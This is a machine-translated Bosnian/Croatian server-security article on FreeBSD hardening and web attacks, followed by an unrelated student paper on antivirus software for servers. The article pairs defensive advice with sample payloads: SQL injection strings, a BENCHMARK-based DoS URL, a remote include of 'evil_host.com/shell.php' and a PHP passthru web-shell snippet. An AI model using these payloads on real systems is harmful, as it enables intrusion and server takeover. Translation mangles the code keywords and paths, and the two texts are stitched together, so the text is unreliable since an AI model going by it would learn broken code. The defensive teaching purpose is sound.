    Napravit ću ovdje lirsku digresiju i reći ću vam kako sam se morao slomiti. Nakon čitanja članaka na Internetu koji obično počinju ovako "preuzmite izvor i stavite ga instalirajte". Dakle, što je sljedeće? Kako ćete instalirati novu verziju? Zadržite staru verziju pa je instalirajte (de | un) instalirajte? I u novom make ponovo instalirati? Ova pitanja je postavio moj prijatelj Dmitrij Dubrovin kada smo počeli savladavati FreeBSD. Počeo sam shvaćati da je u pravu, i, barem besplatno, ovaj put nije bio prikladan i, ne slijedeći put programera FreeBSD -a, samo sam sebi zakomplicirao stvari.

    Sada kada ste savladali FreeBSD, kada nekoliko naredbi preuzme nove izvore za Free kernel i cijeli sistem, tada nekoliko naredbi stvara novi svijet i kernel, a zatim se portovi i aplikacije u sistemu ažuriraju, počinjete da biste razumjeli moć * nix sistema. Teško je prenijeti ponos koji osjećate kada nadogradite server sa FreeBSD -om sa stare grane na sadašnju, obnovite sistemski svijet, kada se sistem sastavi iz novih izvora (izgleda da se Munchausen izvukao za kosu) i sve što je radilo prije nadogradnje također radi "bez datoteke".

    Kao što ste već shvatili, imperativ je pretplatiti se na sigurnosnu poštu od programera softvera koji podržava vaše poslovanje i periodično je ažurirati. Obnova svega i svih mora se usavršiti i staviti na pravi put.

  • Sigurnosno podešavanje... Većina serverskih operativnih sistema prema zadanim postavkama nije dovoljno konfigurirana za rad u oštrom "hemijskom" okruženju Interneta. Da biste spriječili da hakeri "varaju" na vašem serveru, morate podesiti sigurnost, naime, pročitati sigurnosne preporuke proizvođača operativnog sistema. Administratori * nix sistema mogu nazvati sigurnost čovjeka i, nakon čitanja savjeta programera, ostvariti bajku. No, bez obzira na operativni sistem, morate temeljito testirati rad servera i usluga nakon sigurnosnog podešavanja.
  • Firewall... Konfigurirani vatrozid, koji ste lično provjerili pomoću skenera portova, kao što su nmap i skeneri ranjivosti, da li svi razumijete o čemu se radi? Prilikom konfiguriranja vatrozida zapamtite da postoje načini zaobilaženja njegovih pravila. Na primjer, postoji lokalna mreža zaštićena vatrozidom, postavljanjem zastavice za zabranu fragmentacije paketa, u određenim situacijama možete doći do odredišta u lokalnoj mreži. Ili uobičajena greška administratora, pretjerano povjerenje u odlazne pakete vašeg vlastitog servera.

    Zamislite stvarnu situaciju, neprijateljski kod pokušava uspostaviti vezu s domaćinom vlasnika hakera, a vi imate pravilo u zaštitnom zidu "sve je dozvoljeno od mene do interneta". Prilikom sastavljanja pravila za vatrozid morate potpuno razumjeti cjelokupnu sliku mrežne komunikacije vaših usluga između njih i udaljenih klijenata.

  • Sistem za otkrivanje upada... Vatrozid se može smatrati kamenim zidovima u blizini viteškog dvorca. Podignut jednom i sjedite unutra - suh i udoban. Ali šta ako neko već testira čvrstoću zidova od topa? Možda već morate pogledati iz dvorca i gomilati se na nekoga? Da biste znali šta se dešava izvan zidina dvorca, onih izvan, morate imati sistem za otkrivanje upada (IDS) na serveru. Ako imate takav sistem zasnovan na paketu koji vam se sviđa, onda ako neko počne pucati iz topa nmap, tada ćete biti svjesni, a i napadač će biti svjestan "onoga što znate".
  • Analiza nestandardnih situacija... Brojni dnevnici na sistemu često čitaju "greška: nije otvorena datoteka / etc / passwd" ili "pristup odbijen". Ovo su mala zvona koja pozivaju na pogrešno konfiguriranu aplikaciju koja ne može pročitati nešto, negdje, ili možda ovo nije zvono, već alarm koji oglašava alarm o hakeru koji je na pola puta.

    U svakom slučaju, administrator bi trebao biti svjestan takvih stvari. Kako bi se olakšao rad administratora, stvoreni su programi koji će analizirati zapisnike na pojavu zanimljivih fraza i poslati izvještaj administratoru putem pošte. Nemojte zanemariti takvu priliku, takvi programi su uporedivi sa čuvarima koji provjeravaju na putu od povjerenja, ali ponašaju li se svi kako je propisano?

  • Uklonite verzije softvera... Uklonite bannere sa svojih usluga. Ne postoje oni banneri koje prikazujete na svojoj web lokaciji, već oni redovi koje vaši programi daju u pozdravima prilikom povezivanja ili u ispisu grešaka. Nema potrebe blistati oko verzija svojih programa, hakeri traže verzije na internetu za dostupne programe koji iskorištavaju ovu ili onu ranjivost (exploit - exploit).

    Ne postoji jedinstveno rješenje, na primjer, ako instalirate određeni program s portova, nemojte pisati make install clean, pa će se bez vas sve preuzeti, kompajlirati i instalirati. Bolje napravite dohvat; napraviti ekstrakt; zatim idite u poddirektorij datoteka i tamo u izvornom kodu možete ispraviti verziju programa ili je prenijeti kao drugu, a zatim samo očistiti instalaciju.

    Apache je vrlo informativan izvan mjesta i još uvijek sjaji s verzijama sistema, PHP, Perl, OpenSSL. Onemogućeno navođenjem direktiva u httpd.conf ServerSignature Off ServerTokens Prod. Na internetu možete pronaći pomoć pri zamjeni bannera za bilo koji program. Cilj je jedan - oduzeti napadaču vrijedne informacije. Gledajući popis usluga dostupnih s interneta, zapitajte se daje li on nepotrebne podatke o sebi i podatke koje pohranjuje.

    Na primjer, povezivanje DNS servera može omogućiti "prijenos zona", a vaši računari sa svojim IP -om i imenima domena bit će dostupni svima, što je loše. Sami provjerite svoj poslužitelj raznim skenerima i pažljivo pročitajte njihov rezultat. Prilikom zamjene programskog banera, savjetujem vam da ne ubacujete nasumični tekst, već upozorenje o odgovornosti i da se radnje bilježe. Kako je bilo incidenata pri puštanju hakera u sudnici, tako i na hakiranom FTP serveru postojao je natpis "Dobrodošli! Dobro došli!".

  • Pravilo potrebnog minimuma... Minimizirajte dostupne internetske usluge. Onemogućite nepotrebno jer ne možete hakirati ono što je onemogućeno. Uobičajena greška, na primjer, kada je MySQL poslužitelj uparen s Apacheom na istoj mašini konfiguriran da bude udaljeno dostupan na svom standardnom portu 3306. Zašto? Izdajte naredbu netstat -na | grep SLUŠAJTE i dajte sebi odgovor: znate li koji programi koriste koje sučelje i koji port? Da li kontrolišete situaciju? Pa ako je tako.
  • Mnogo jakih i različitih lozinki... Često u hakiranim video zapisima ili hakerskim pričama o hakiranju, izraz "dobro je da je administrator imao jednu lozinku za administratorsku ploču, koja je također došla do ssh i ftp". Nadam se da se ne radi o vama. Otuda pravilo: lozinke za različite usluge moraju biti različite i imati najmanje 16 znakova. Neka se to zapiše na komad papira ako se bojite zaboraviti (na ovom mjestu me sigurnosni stručnjaci ubijaju), ali to je bolje nego da udaljeni napadač dešifrira vašu lozinku za nekoliko minuta, budući da je mala lozinka i sličnost sa rečničkom rečju mi ​​je to omogućila.

    Lako je napraviti različite lozinke za različite usluge ako će usluge biti autorizirane ne kao korisnici sistema u / etc / passwd bazi podataka, već kao virtualne u vlastitim planarnim ili DBMS bazama podataka. Ne čuvajte lozinke na serverima u datoteci password.txt za sve resurse kojima kao administrator imate pristup.

  • Ograničenje... Sve vaše usluge na serveru trebale bi raditi pod različitim ograničenim računima i nikada se ne bi trebale izvršavati pod root računom. Vjerujte mi, ako dođu do eskalacije privilegija s ograničenog računa na root status (uid = 0, gid = 0), bit ćete spašeni odsustvom poznatih rupa u ažuriranom sistemu.

    Usput, mnogi administratori zaboravljaju tako nešto, na primjer, zašto računi za Apache i MySQL imaju pristup ljusci! Uostalom, možete ga isključiti i umjesto ljuske navesti / bin / false. Pa, iskreno, provjerite svoje račune programa na poslužitelju za izvještaje i recite mi ako griješim. U svojim SQL bazama podataka ograničite račune na minimalno potrebne privilegije. Ne odobravajte privilegije FILE kada se pozove samo SELECT.

  • Svi u zatvor! Naučite raditi sa sandbox -ovima (sandbox) ili zatvorom (jail) i pokretati aplikacije u tim izoliranim prostorijama, to će otežati hakiranje cijelog servera. Ako koristite virtualizaciju, možete širiti usluge na različite gostujuće operativne sisteme.
  • Slojevita odbrana. Moguće je zabraniti nešto na nekoliko načina na različitim mjestima - učinite to. NIKADA nemojte misliti - ovdje sam zabranio, tamo zabranio nepotrebne stvari.

Saznajte više o napadima na ranjive usluge i sam server.

  • DoS (Denial of Service) napad - napad čiji je cilj udariti bilo koji ograničeni resurs servera (internetski kanal, RAM, procesor itd. Itd.), Tako da poslužitelj ne može opsluživati ​​legitimne korisnike. Slikovito rečeno, zamislite da vas je uljez nazvao kući i šutio na telefonu i tako je trajalo cijelu večer. Dosta vam je svega ovoga i isključili ste telefon, a ujutro ste saznali da ste propustili važan poziv od svog šefa. Evo analogije iz stvarnog života za DoS napad.

    U stvarnom životu DoS često izgleda ovako, zbog greške u programu, upotreba CPU -a skače i ostaje na 100% dugo vremena, a napadač povremeno koristi ovu rupu u programu. Krivo napisana aplikacija može iscrpiti svu RAM memoriju. Ili "poštanska bomba" u obliku visoko komprimirane datoteke u arhivi s mnogo znakova [razmak], koju će antivirus raspakirati radi provjere, a raspakirana velika datoteka ispuniti particiju tvrdog diska na poslužitelju ili / i uzrokovati server za ponovno pokretanje.

    DoS zaštita:

    • Ažuriranje programa kojim se manipulira za DoS napad
    • Konfigurirajte kvote resursa za račun s kojeg se ovaj program izvodi. * Nix sistemi vam omogućuju da konfigurirate postotak korištenja procesora, RAM -a, broj pokrenutih procesa, otvorenih datoteka itd. itd.
    • Postavite prijavljivanje u programu i pokušajte pronaći napadača lutkarica te ga blokirati u vatrozidu.
    • Konfigurirajte program kao programera, savjetuje guru, prema člancima na internetu, ako se nađete u takvoj situaciji.
  • DDoS (isti DoS, ali napadnuti ste sa nekoliko zombi računara, pod vodstvom
    napadač). DDoS je destruktivan i koriste ga samo oni vandali koji imaju krda zombificiranih automobila i zahtijevat će novac za zaustavljanje napada ili oštećenje vašeg poslovanja tako da korisnici, bez da dođu do vašeg servera, odu do konkurenta. DDoS napade ne koriste hakeri čiji je cilj inteligentno hakiranje vašeg servera, da, vaš server je "misterija" koju žele "otkriti".

    Kako se zaštititi od DDoS -a? Ako se oslanjate na vlastite napore i resurse, tada možete, automatiziranjem rada sa skriptama, izdvojiti IP adrese iz raznih dnevnika i unijeti ih u zabranjena pravila zaštitnog zida. Na primjer, autor članka "Ima li života pod DDoS -om?" U časopisu Hacker. Mnogo članaka o tome kako ga konfigurirati da minimizira oštećenja DDoS -a.

    DDoS zaštita:

    • Ako je DDoS usmjeren na aplikaciju, pokušajte pronaći u evidencijama razlike između napadača i legitimnih korisnika i automatizirajući je skriptom, unesite je u pravila vatrozida za odbijanje
    • Ako je DDoS usmjeren na sistem (na primjer, napad putem ICMP protokola), pomoću skripte za automatizaciju unesite ga u pravila zaštitnog zida za odbijanje
    • Konfigurirajte kvote resursa za račun s kojeg se ovaj program izvodi. * Nix sistemi vam omogućuju da konfigurirate postotak korištenja procesora, RAM -a, broj pokrenutih procesa, otvorenih datoteka itd. itd.
    • Konfigurirajte program kao programera, savjetuje guru, prema člancima na internetu, ako se nađete u takvoj situaciji
    • Molimo kontaktirajte svog gornjeg pružatelja usluga kako bi vam pomogao na bilo koji način. Napišite žalbu na adresu [zaštićena e -pošta] host_nets_from_attacked.domain. To će pomoći djelomično uništiti napadačevu mrežu, dopustiti mu da pretrpi štetu, košta ga novca. Doživjet ćete moralno zadovoljstvo.
    • Upoznajte se sa mod_security za Apache, koji je odličan alat koji će vam pomoći u nekim situacijama.
  • Lozinka bruteforce napad. Ovdje rupe u programima nisu krive, samo grubo odaberu par korisničkog imena / lozinke. Ko je napustio server sa konfiguriranim ssh -om, ali je zaboravio ograničiti pristup ssh -a sa određenih IP adresa i sa određenim podacima za prijavljivanje (direktiva u ssh_config AllowUser), morao je vidjeti u dnevnicima pokušaje brutalne forsiranja lozinke masha: password_mash.

    Lozinka bruteforce zaštita:

    • Ograničite broj neuspjelih pokušaja prijave / lozinke
    • Ako aplikacija dopušta, tada konfigurirajte povećanje vremena prije novog pokušaja prijave / lozinke.
    • Ako bi aplikacija trebala raditi uski krug ljudi, stvorite takvo pravilo i ograničite ih

Napad putem dinamičkog sadržaja usluge

Ova vrsta napada često se javlja na Apache + (PHP | PERL) + (MySQL | PostgreSQL) snopu za * nix svijet i IIS + ASP + Microsoft SQL Server za svijet MS Windows pomoću jednostavnog preglednika, ali ovo je samo poseban slučaj, koji se samo češće koristi zbog popularnosti weba. U ovom paketu programski jezici su ASP, PHP, Perl, SQL, pa će ih hakeri često koristiti za sastavljanje svojih destruktivnih konstrukcija.

ALI najvažnije je razumjeti da su takvi ligamenti usluga + dinamički sadržaj povrh njih postoji mnogo programskih jezika i stoga su svi pod oružjem hakera. Na primjer, ovo je nepotpuna lista:

  • Web server + CGI skripte
  • Drevni paket koji se sada ne koristi - Apache + PHF (naime P H F) skripte
  • IIS + ColdFusion Application Server
  • SSI (Server Side Includes) mehanizam

Nadalje, govorit ćemo uglavnom o web-hakiranju, ali ne zaboravite da sve dolje opisano vrijedi i za ostale pakete usluga + dinamički sadržaj. Riječi su različite, ali suština je ista. Danas hakeri napadaju web pretraživačem, sutra R klijentom protiv usluge Z. Web server, koji je i sam povezan sa bazama podataka i sa brojnim programskim jezicima, postao je platforma za napade ove vrste.

Smisao svih napada ove vrste svodi se na pokušaj korištenja preglednika za skeniranje web lokacije radi grešaka u skriptama koje poslužuju dinamički sadržaj web lokacije.

Otuda je zaključak - hakiranje web stranice napadom na web, koji sadrži samo statičke html stranice koje povezuju samo jedna s drugom, NEMOGUĆ. Napadi putem vaše web stranice nastali su kada su ljudi htjeli veću interaktivnost i dodali je putem programskih jezika i baza podataka.

Hakeri koji surfaju web lokacijom, posebnu pažnju obraćaju na skripte kojima se prosljeđuju bilo koji parametri. Ali šta ako autor skripte ne proveri šta se tačno prenosi kao vrednost parametra?

Opća rješenja za administratora protiv napada na dinamički sadržaj usluge (web stranica, kao poseban slučaj)

  • Update... O tome smo već govorili, ali ako koristite razvoj treće strane (motori foruma, galerija, chatova itd.), Tada primajte poruke o ranjivostima i zakrpite rupe. Mišljenje hakera je da ako portal radi s financijama i njihovim prometom, onda na takvom portalu nije poželjno imati tuđa zbivanja, osim vlastitog. Naravno, pretpostavlja se da su razvoj vlastitih motora za web stranicu napisali koderi koji znaju kako sigurno programirati i razumiju prijetnje na internetu.
  • Budite nestandardni... U mnogim hakerskim alatima često se pojavljuju baze podataka o ranjivosti, forum puteva /, galerija /, slike /. Vrlo udobno! Znajte administratora, polovica će se obrijati i pljunuti na vašu web lokaciju kada se vaša web stranica ne nalazi na / usr / www, a vaše administratorsko područje nije site.com/admin. Zaključak je da, ako niste standardni, ovo je dodatni štap u kotačima hakera koji napada vašu web lokaciju. Morat će dodati / popraviti ručnu bazu / skriptu. Da li haker uvijek može ili želi? Mladi skriveni kidis hakeri definitivno će biti uplašeni. Evo na primjer PHP sigurnosnih savjeta

    # Neka PHP kod izgleda kao druge vrste kodova
    AddType application / x-httpd-php .asp .py .pl
    # Neka PHP kod izgleda kao kodovi nepoznatih tipova
    AddType aplikacija / x-httpd-php .bop .foo .133t
    # Neka PHP kod izgleda kao html
    AddType aplikacija / x-httpd-php .html .htm

    Ovaj oblik zaštite PHP -a kroz zataškavanje ima nekoliko nedostataka po niskoj cijeni. Sami hakeri, opisujući svoje hakove, pišu da preuzimaju isti softver koji se nalazi na vašem poslužitelju s razvojne stranice i gledaju s kojim zadanim imenima / stazama tablica / ovim ili onim mehanizmom radi. Općeniti smisao u tome što je nestandardan je odgoditi proces hakiranja kako haker ne bi uspio u "blitzkriegu", a što više vuče, veća je vjerovatnoća da će biti otkriven.

  • Uklonite verzije strojeva i skripti na web mjestu... Ovo su vrijedne informacije kojih bi napadač trebao biti lišen, znajući za koju verziju traže gotova rješenja za hakiranje. Uvjerite se da vaše skripte ne prikazuju korisne informacije o greškama, kao što su: put do skripte u kojoj je došlo do greške (problem "proširenja putanje") i sam izlaz greške.
  • Razmislite o tome da li vam je potreban .htaccess... Prisustvo .htaccess datoteka znači da možete nadjačati svoje opcije postavljene u glavnoj konfiguraciji Apachea, vjerujte, hakeri će to učiniti. Ako onemogućite upotrebu .htaccess s direktivom "AllowOverride None", tada ćete dobiti korist od performansi za Apache, jer neće sa svakim zahtjevom pregledati sve direktorije na putu do web stranice i povećati sigurnost Apache web server.

Saznajte više o napadima na dinamički sadržaj (web stranica kao poseban slučaj)

  • XSS (Cross Site Scripting).
    Skriptiranje na više web lokacija naziva se XSS, a ne CSS, jer je CSS rani akronim za Kaskadne tablice stilova. XSS napadi nisu usmjereni protiv servera, već protiv korisnika tog servera. Ali administrator nije nužan da bi bio sretan! XSS napad izgleda ovako, web mjesto ima polja za uređivanje na web stranici ili parametre skripte koji nisu filtrirani na konstruktima poput<, >, javascript.

    Haker dodaje kôd programskog jezika na strani klijenta, obično Java i VBScript, u ​​polja za uređivanje, a ovaj kôd postaje dio HTML stranice. Kada korisnik posjeti takvu stranicu, njihov preglednik analizira stranicu i izvršava ovaj kôd.
    Šta hakeri rade s XSS -om?

    • Krađa kolačića (kolačići, lepinje) - ove tekstualne datoteke pohranjuju podatke koje je poslužitelj "stavio" korisniku radi njegove naknadne identifikacije. U primjeru, ako kreirate datoteku test.html s takvim sadržajem (sami je napišite ručno), tada će se, kada je pokrenete u pregledniku, prikazati XSS.
      Poštovani administratore, došlo je do greške prilikom posjete web stranici
      Help

      Ali možete napisati skriptu na Javi i ozbiljnije... Obično se takve skripte pišu na administratorsku web -poštu i, koristeći društveni inženjering, pokušavaju ga natjerati da pročita poruku kako bi dobio njegove kolačiće.

      Ako se kolačići ne vezuju za IP adresu i dodatne mere zaštitu, a zatim zamijenite njihove kolačiće kolačićima administratora i pokušajte ući na administratorsku ploču koja ne provjerava korisničko ime i lozinku i identificira ljude samo pomoću kolačića.

    • Deface web stranice (deface - zamjena početne stranice web lokacije, najčešće index.html)
    • Trojanizacija udaljenog korisnika. Svježi exploiti se biraju za preglednike korisnika i kada uđu na ranjivu stranicu, pokušava se zaraziti računar trojancem. Ako korisnik ima instaliran antivirusni program sa svježim bazama podataka, on će naznačiti pojavu trojanca u sistemu. I vaša će web lokacija pasti u očima korisnika, možda vam više neće doći.
    • DoS. S velikim brojem posjetitelja, skripta će dodatno zahtijevati više drugih stranica s vašeg poslužitelja ili s drugog, možda je to za nekoga DoS.

    Rešenje:

    • Da biste blokirali pisanje html oznaka u bazu podataka iz polja za unos informacija, koristite konstrukcije poput htmlspecialchars za PHP, koje će zamijeniti< на <, >na>, & na & i tako dalje
      Primjer,

      $ comment = htmlspecialchars ($ comment, ENT_QUOTES);
      $ query = "umetni u knjigu gostiju
      (ime, lokacija, e -pošta, url, komentar) vrijednosti
      ("$ name", "$ location", "$ email", "$ url", "$ comment") ";
      mysql_query ($ query) ili die (mysql_error ());

    • Provjerite i filtrirajte u svojim skriptama sve parametre koje korisnik unese i koji se prosljeđuju skripti kroz adresnu traku. Naučite kako pravilno koristiti regularne izraze za raščlanjivanje dolaznih podataka. Pronađite materijal koji podučava sigurne tehnike kodiranja za vaš programski jezik.
    • Ako želite koristiti tehnologiju kolačića na svojoj web stranici, pročitajte sigurne metode rad sa kolačićima. Ograničite njihove radnje na vrijeme i IP adrese.
    • Kao administrator, budite oprezni kada vas uzgaja društveni inženjering. Ne zaboravite na sigurnost ličnih računara na računaru klijenta.
  • SQL injekcija. SQL injekcija.
    Ova bolest znači da se neoznačeni parametar zamjenjuje u SQL upitu koji se pojavljuje u skripti. Haker pronalazi skripte za ubrizgavanje SQL -a na jednostavan način, navodnik site.com/view.php?id=1 "isporučuje se vrijednosti parametra" ili se numerički parametar mijenja tako da se site.com/view.php?id=2-1.

    Ako umetnuti navodnik uzrokuje "grešku" (hrpa poruka da se takav i takav zahtjev ne izvršava u takvoj i takvoj skripti na ovoj putanji), tada je takva skripta kandidat za njeno dodatno pumpanje. Cyber ​​kriminalci često koriste Google hack, tražeći pretraživač sa sličnim upitima "site: www.victim.ru Warning."

    Kôd koji ne provjerava vrijednost i pati od SQL injekcije

    $ id = $ _REQUEST ["id"];
    $ result = mysql_query ("ODABERI naslov, tekst, datumske vesti, autora IZ 'vesti` WHERE` id` = "$ id" ");

    Sada zamislite da ćete umjesto broja zamijeniti "-1 union select null / *" (bez navodnika) i tada će se vaš upit pretvoriti

    SELECT naslov, tekst, datumske vijesti, autor IZ `vijesti` WHERE` id` ="- 1 sindikat odaberite null / *"

    Odnosno, haker želi, osim vašeg zahtjeva, i njegov zahtjev, u kombinaciji s vašim, koristeći direktivu sindikata. A onda će haker pokušati sastaviti druge upite i, s obzirom na moć SQL jezika, to ne sluti na dobro za administratora. Od defacea (deface - zamjena početne stranice web stranice) do dobijanja root prava na vašem poslužitelju. Haker također može izvesti DoS napad zahvaljujući SQL injekciji: site.com/getnews.php?id=BENCHMARK(10000000,BENCHMARK(10000000, md5 (current_date))) nekoliko takvih zahtjeva i poslužitelj na 100% CPU -u opterećenje na duže vreme.

    Zaštita od SQL injekcija:

    • U velikoj mjeri koristite alate SQL Servera kao što su prikazi i pohranjene procedure. Ovo će ograničiti neovlašteni pristup bazi podataka.
    • Prije nego što se parametru proslijedi zahtjev, mora se provjeriti njegov tip (za PHP - is_bool (), is_float (), is_int (), is_string (), is_object (), is_array () i is_integer ()) i, na barem citirajte koristeći konstrukciju poput dodatih crta za PHP.
    • Sve skripte rade s bazom podataka s nekog računa baze podataka, uklonite sve privilegije s ovog računa koje nisu potrebne za rad. Često hakeri koriste naredbu MySQL (MySQL je uzet kao primjer, ovo se odnosi na bilo koji SQL server) "LOAD DATA INFILE" za čitanje datoteka koje su im potrebne sa servera i čitljivog računa pod kojim je pokrenut MySQL. Otuda zaključak, onemogućite nepotrebne privilegije za svoje skripte, poput FILE, koje su potrebne za korištenje naredbe LOAD DATA INFILE. Princip "osnovnog minimuma" treba uzeti kao osnovu.
    • Sistemski Račun, s kojeg radi SQL server, ne bi trebao imati pristup stranicama web stranica i sistemskim datotekama poslužitelja.
  • Povezivanje datoteka. Uključi datoteku. Recimo da postoji stranica site.com/getnews.php?file=190607, ali autor skripte, koristeći include, povezuje stranicu, bez provjeravanja.

    $ file = $ _REQUEST ["datoteka"];
    include ($ datoteka. ". html");

    Haker će zamijeniti evil_host.com/shell.php umjesto 190607 i tada će cijela traka za adresu hakerova preglednika izgledati kao site.com/postnews.php?file=evil_host.com/shell.php i haker će imati svoju vlastitu web ljusku na vašoj web lokaciji s pravima koja Apache posjeduje.

    Zaštita povezivanja datoteka:

    • Provjerite i filtrirajte u svojim skriptama sve parametre koje korisnik unese i koji se prosljeđuju skripti kroz adresnu traku. Pronađite materijal koji podučava sigurne tehnike kodiranja za vaš programski jezik.
    • Hakerima se jako sviđa kada vam programski jezik na web mjestu dozvoljava pokretanje sistemskih naredbi. Stoga morate zabraniti pozivanje takvih funkcija u svom programskom jeziku, ako je to naravno moguće. Na primjer, u postavkama PHP -a moguće je navesti listu "zabranjenih" funkcija pomoću disable_functions u php.ini.
  • Trojan Picture
    Ako imate mogućnost postavljanja datoteka na server na web mjestu, budite spremni za postavljanje, na primjer, slika avatara. Na slici u JPEG formatu postoji koncept metapodataka (zapamtite gdje kamera zapisuje informacije pri snimanju kadra) i ti metapodaci će biti zapisani

    "; passthru ($ _ GET [" cmd "]); echo""; ?>

    slika će biti preimenovana u avatara.jpg.php, zaobići većinu provjera ekstenzije, a koristit će site.com/upload_images/avatara.jpg.php?cmd=server_commands

    Trojanska zaštita:

    • Ispravno provjerite nastavak datoteke. Čak i ako ispravno obradite dozvoljene datoteke, budite spremni da će se slika iz jpg u php preimenovati pomoću druge ranjivosti na vašoj web lokaciji. Provjerite metapodatke na slici pomoću funkcija poput exif_read_data () u PHP -u.
    • Zabranite putem vašeg web servera izvršavanje programskih jezika u katalozima sa slikama. Da biste to učinili, u konfiguracijama Apachea potražite retke poput "AddType application / x-httpd-", koji povezuju programske jezike s nastavcima datoteka i zabranjuju njihovo izvršavanje u direktorijima sa slikama. Za Apache će zabrana izvršavanja PHP jezičkih datoteka biti konstrukcija


      Naređenje negiraj, dozvoli
      Odbijte od svih

    • Za svoj programski jezik pronađite materijal koji uči sigurnim tehnikama programiranja za obradu slika i njihovo pravilno postavljanje na server.

Lična zahvala:

  • prijatelj Aleksandar Pupyshev zvani ris za kritike i savjete
  • web stranica antichat.ru/
  • web stranica xakep.ru/
  • knjiga Michael Eben, Brian Tyman. FreeBSD administracija: Umjetnost balansiranja
  • knjiga Joela Skembraya, Stuarta McClara, Georgea Kurtza. Tajne hakera: Sigurnost mreže - gotova rješenja. Drugo izdanje

Drugi izvori informacija o zaštiti:

  • FreeBSD man security stranica sadrži opća sigurnosna pitanja i dobre administrativne prakse.
  • Pretplatite se na dopisne liste freebsd-security @ freebsd.org. Da biste to učinili, pošaljite e-poruku na majordomo @ freebsd.org s tekstom subscribe freebsd-security u tijelu poruke. Na ovoj mailing listi se raspravlja o najhitnijim sigurnosnim pitanjima.
  • Stranica sigurnosnih informacija o FreeBSD -u freebsd.org/security/
  • FreeBSD Security How-To Document
  • Web stranica CERT.org sadrži informacije o ranjivosti u zaštiti svih operativnih sistema.
  • Zaštitni zidovi i internetska sigurnost, William R. Cheswick i Steven M. Bellowin
  • Izgradnja Internet zaštitnih zidova (2. izdanje) Brent Chapman i Elizabeth Zwicky

Ishod:
Nadam se da vam je članak pomogao da zajedno sagledate sve probleme, sada administrator mora pročitati o računalnoj sigurnosti, bazama podataka, web poslužiteljima, programskim jezicima iz dodatnih izvora. Ukratko rezimirajući članak, morate biti svjesni vijesti o oslobađanju sigurnosnih problema, ažurirati i provjeriti sve ulazne podatke u ispravnost vašeg razvoja.
Neka sila bude s vama!

Chita State University Energy Institute Fakultet za ekonomiju i informatiku Odsjek za primijenjenu informatiku i matematiku Sažetak na temu: korisnik računara na temu: Antivirusni softver za servere Izvođač: Art. gr. PI-07-1 Zlova V.V. Provjereno: čl. Rev. odeljenje PIMMonich I.P. Čita, 2007 Sadržaj

Uvod. 3

1 Datotečni serveri kao jedan od izvora širenja virusa. 5

2 Antivirusni softver za LAN servere. 5

3 Antivirusni softver za servere pošte. osam

4 Kaspersky Anti-Virus. jedanaest

Zaključak. 17

Popis korištene literature .. 18

Uvod Računarski virusi danas su jedna od najopasnijih prijetnji informacionoj sigurnosti. Računalni virus je posebno napisan program koji se može spontano priključiti na druge programe, stvoriti vlastite kopije i umetnuti ih u datoteke, sistemska područja računala i računalne mreže kako bi ometao rad programa, oštetio datoteke i direktorije te stvorio sve vrste smetnji u računaru.

Pod informacijskom sigurnošću podrazumijeva se sigurnost informacija i prateće infrastrukture od slučajnih ili zlonamjernih utjecaja koji mogu rezultirati oštećenjem samih informacija, njihovih vlasnika ili prateće infrastrukture. Zadaci sigurnosti informacija svode se na smanjenje štete, kao i predviđanje i sprječavanje takvih uticaja.

Za većinu organizacija zaštita mrežnih resursa od neovlaštenog pristupa postaje jedan od najhitnijih problema. Posebno zabrinjava činjenica da se Internet sada široko koristi za transport i pohranu različitih podataka i povjerljivih korporativnih podataka.

Zadatak zaštite informacija posebno je relevantan za vlasnike internetskih baza podataka, izdavače elektronskih časopisa itd.

Do danas su stvoreni mnogi antivirusni programi za borbu protiv virusa. Antivirusni program (antivirus) izvorno je program za otkrivanje i liječenje programa zaraženih računarskim virusom, kao i za sprečavanje zaraze datoteke virusom (na primjer, putem vakcinacije). Mnogi moderni antivirusi mogu otkriti i ukloniti trojance i druge zlonamjerne programe. Antivirusni softver sastoji se od računarskih programa koji pokušavaju otkriti, spriječiti i ukloniti računarske viruse i drugi zlonamjerni softver. Antivirusni softver pomaže u zaštiti vašeg računara od poznatih virusa, crva, trojanaca i drugog zlonamjernog softvera koji se može srušiti. U radu računara. Poslužitelji datoteka i pošte sada su primarni alat za upravljanje podacima. Pohranjivanje, razmjena i prijenos podataka glavni su zadaci takvog upravljanja, ali su nemogući bez lakog pristupa informacijama, integracije podataka i stabilnosti sistema. Poslužitelj datoteka jedan je od najugroženijih mrežnih resursa. U slučaju infekcije ili kvara, pristup drugim mrežnim resursima može biti ograničen. Jedna zaražena datoteka može dovesti do infekcije velike količine podataka, gubitka integracije podataka i kvara sistema. Ovi rizici doprinose visokim troškovima proizvoda za upravljanje poslužiteljem i mrežom. "Javni" poslužitelji datoteka i elektroničke konferencije jedan su od glavnih izvora širenja virusa. Gotovo svake sedmice stiže poruka da je korisnik zarazio svoj računar virusom koji je uklonjen s BBS-a, ftp-servera ili bilo koje elektroničke konferencije. Istodobno, često zaražene datoteke autor virusa "stavlja" na nekoliko BBS / ftp -a ili šalje na nekoliko konferencija istovremeno, a te se datoteke prikrivaju kao nove verzije nekog softvera (ponekad - pod novim verzijama antivirusa) . U slučaju masovne distribucije virusa na ftp / BBS datotečne servere, hiljade računara mogu se inficirati gotovo istovremeno, ali u većini slučajeva DOS ili Windows virusi su "podmetnuti", čije je širenje u modernim uvjetima mnogo sporije nego makro virusi. Iz tog razloga ovakvi incidenti gotovo nikada ne završavaju masovnim epidemijama, što se ne može reći za makro viruse. 2 Antivirusni softver za LAN servere Pitanja učinkovite zaštite od virusa danas su aktuelnija kako u korporativnom sektoru, tako i među privatnim korisnicima, međutim, za razliku od potonjih, problemi i zadaci s kojima se suočavaju kompanije mnogo su ozbiljniji i zahtijevaju rješenja na drugom nivou. Administratori korporativnih informacijskih sistema moraju instalirati antivirusne alate, konfigurirati ih i konfigurirati politike ažuriranja, kao i osigurati da su antivirusi stalno omogućeni na stotinama ili čak hiljadama mašina - a često to moraju učiniti ručno. Lokalne mreže jedan su od glavnih izvora virusa. Ako se ne poduzmu potrebne mjere zaštite, zaražena radna stanica inficira jednu ili više servisnih datoteka na poslužitelju pri ulasku u mrežu (u slučaju Novell NetWare, LOGIN.COM). Sljedećeg dana korisnici prilikom prijavljivanja na mrežu pokreću zaražene datoteke. Umjesto servisne datoteke LOGIN.COM, na serveru može biti instaliran i raznovrsni softver, standardni predlošci dokumenata ili Excel tablice koji se koriste u kompaniji.

